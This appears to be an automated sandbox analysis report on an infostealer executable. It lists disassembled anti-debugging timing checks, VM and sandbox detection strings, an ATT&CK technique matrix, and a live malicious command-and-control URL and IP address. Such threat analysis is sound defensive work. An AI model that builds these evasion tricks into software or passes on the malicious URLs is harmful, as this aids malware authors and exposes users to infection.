Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73400E8 second address: 73400F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7340856 second address: 7340885 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F262CBE4E8Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7340885 second address: 73408E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F262D38FB13h 0x00000014 sub eax, 18F0303Eh 0x0000001a jmp 00007F262D38FB19h 0x0000001f popfd 0x00000020 call 00007F262D38FB10h 0x00000025 pop eax 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73408E5 second address: 73408EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73408EB second address: 73408EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7340D6D second address: 7340D7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7340D7C second address: 7340D82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7340D82 second address: 7340D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7340D86 second address: 7340D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7390B38 second address: 7390B3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7370021 second address: 7370065 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F262D38FB18h 0x00000008 sub eax, 02DAA228h 0x0000000e jmp 00007F262D38FB0Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F262D38FB11h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7370065 second address: 73700CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F262CBE4E97h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F262CBE4E99h 0x0000000f sbb eax, 6E814A56h 0x00000015 jmp 00007F262CBE4E91h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esp], ebp 0x00000021 jmp 00007F262CBE4E8Eh 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73700CE second address: 73700EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73700EB second address: 7370136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF0h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F262CBE4E8Ch 0x00000013 sbb al, 00000038h 0x00000016 jmp 00007F262CBE4E8Bh 0x0000001b popfd 0x0000001c mov ch, 83h 0x0000001e popad 0x0000001f sub esp, 44h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F262CBE4E8Eh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7370136 second address: 7370148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262D38FB0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 737021B second address: 737021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 737021F second address: 7370225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7370225 second address: 7370254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F269CCA7089h 0x00000011 pushad 0x00000012 mov eax, 40D87411h 0x00000017 mov eax, 0CBF404Dh 0x0000001c popad 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F262CBE4E8Fh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7370254 second address: 73702BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov edx, ecx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F262D38FB16h 0x00000014 add si, 4828h 0x00000019 jmp 00007F262D38FB0Bh 0x0000001e popfd 0x0000001f popad 0x00000020 popad 0x00000021 pop ebx 0x00000022 jmp 00007F262D38FB15h 0x00000027 mov esp, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73702BE second address: 73702C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73702C2 second address: 73702C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73A08DA second address: 73A0928 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F262CBE4E8Ch 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F262CBE4E90h 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 mov edi, ecx 0x00000017 pushfd 0x00000018 jmp 00007F262CBE4E8Ah 0x0000001d sbb ecx, 35A4B298h 0x00000023 jmp 00007F262CBE4E8Bh 0x00000028 popfd 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73A0928 second address: 73A092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73A092C second address: 73A0932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7390A69 second address: 7390A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7390A6D second address: 7390A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, 29987645h 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F262CBE4E8Dh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73A0B6A second address: 73A0BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F262D38FB14h 0x00000013 adc ax, 97C8h 0x00000018 jmp 00007F262D38FB0Bh 0x0000001d popfd 0x0000001e mov ecx, 1390093Fh 0x00000023 popad 0x00000024 push dword ptr [ebp+0Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov ecx, ebx 0x0000002c mov si, di 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 74109F8 second address: 74109FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 74109FC second address: 7410A02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410A02 second address: 7410A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262CBE4E91h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410A17 second address: 7410A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410A1B second address: 7410A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F262CBE4E8Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F262CBE4E97h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410A4A second address: 7410A6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410A6F second address: 7410A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410A75 second address: 7410AA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dl, byte ptr [ebp+14h] 0x0000000c pushad 0x0000000d jmp 00007F262D38FB0Eh 0x00000012 popad 0x00000013 mov eax, dword ptr [ebp+10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410AA7 second address: 7410AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410AAB second address: 7410AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410AAF second address: 7410AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410AB5 second address: 7410ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410ABB second address: 7410B45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dl, 00000007h 0x0000000b jmp 00007F262CBE4E99h 0x00000010 test eax, eax 0x00000012 jmp 00007F262CBE4E8Eh 0x00000017 je 00007F269CC2A589h 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F262CBE4E8Eh 0x00000024 xor ch, FFFFFFA8h 0x00000027 jmp 00007F262CBE4E8Bh 0x0000002c popfd 0x0000002d mov cx, 869Fh 0x00000031 popad 0x00000032 sub ecx, ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F262CBE4E8Ch 0x0000003d jmp 00007F262CBE4E95h 0x00000042 popfd 0x00000043 movzx eax, di 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7410B45 second address: 7410B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7400494 second address: 74004AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 74004AF second address: 74004DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F262D38FB0Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 74004DC second address: 74004EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov eax, 3147FE0Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 74004EE second address: 7400530 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F262D38FB10h 0x0000000f sub cl, FFFFFFE8h 0x00000012 jmp 00007F262D38FB0Bh 0x00000017 popfd 0x00000018 mov dx, si 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F262D38FB11h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7400530 second address: 7400536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7400536 second address: 740053A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSpecial instruction interceptor: First address: D2FA57 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSpecial instruction interceptor: First address: EF9A8A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSpecial instruction interceptor: First address: F5E9EE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exe TID: 3560Thread sleep time: -48024s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exe TID: 3184Thread sleep time: -50025s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exe TID: 2868Thread sleep time: -52026s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0060255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0060255D
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_006029FF
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0060255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0060255D
Source: B43WRnzSPD.exe, B43WRnzSPD.exe, 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: B43WRnzSPD.exe, 00000001.00000003.1576592207.00000000018C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: B43WRnzSPD.exeBinary or memory string: Hyper-V RAW
Source: B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: B43WRnzSPD.exe, 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: B43WRnzSPD.exe, 00000001.00000002.2020839491.0000000001925000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.1912517662.00000000018EB000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2017988366.0000000001913000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018071816.0000000001920000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018361388.0000000001924000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: B43WRnzSPD.exe, 00000001.00000003.1579083944.0000000006C21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\B43WRnzSPD.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\B43WRnzSPD.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\B43WRnzSPD.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\B43WRnzSPD.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\B43WRnzSPD.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\B43WRnzSPD.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\B43WRnzSPD.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\B43WRnzSPD.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\B43WRnzSPD.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\B43WRnzSPD.exeFile opened: NTICE
Source: C:\Users\user\Desktop\B43WRnzSPD.exeFile opened: SICE
Source: C:\Users\user\Desktop\B43WRnzSPD.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\B43WRnzSPD.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeProcess queried: DebugPortJump to behavior
Source: B43WRnzSPD.exe, B43WRnzSPD.exe, 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\B43WRnzSPD.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping741
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
B43WRnzSPD.exe100%AviraTR/Crypt.TPM.Gen
B43WRnzSPD.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=100%Avira URL Cloudmalware
http://home.twentytk20ht.top/TQ100%Avira URL Cloudmalware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3100%Avira URL Cloudmalware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY100%Avira URL Cloudmalware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850fd4100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.twentytk20ht.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		98.85.100.80
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlB43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://html4/loose.dtdB43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              http://home.twentytk20ht.top/TQB43WRnzSPD.exe, 00000001.00000003.2018361388.0000000001924000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
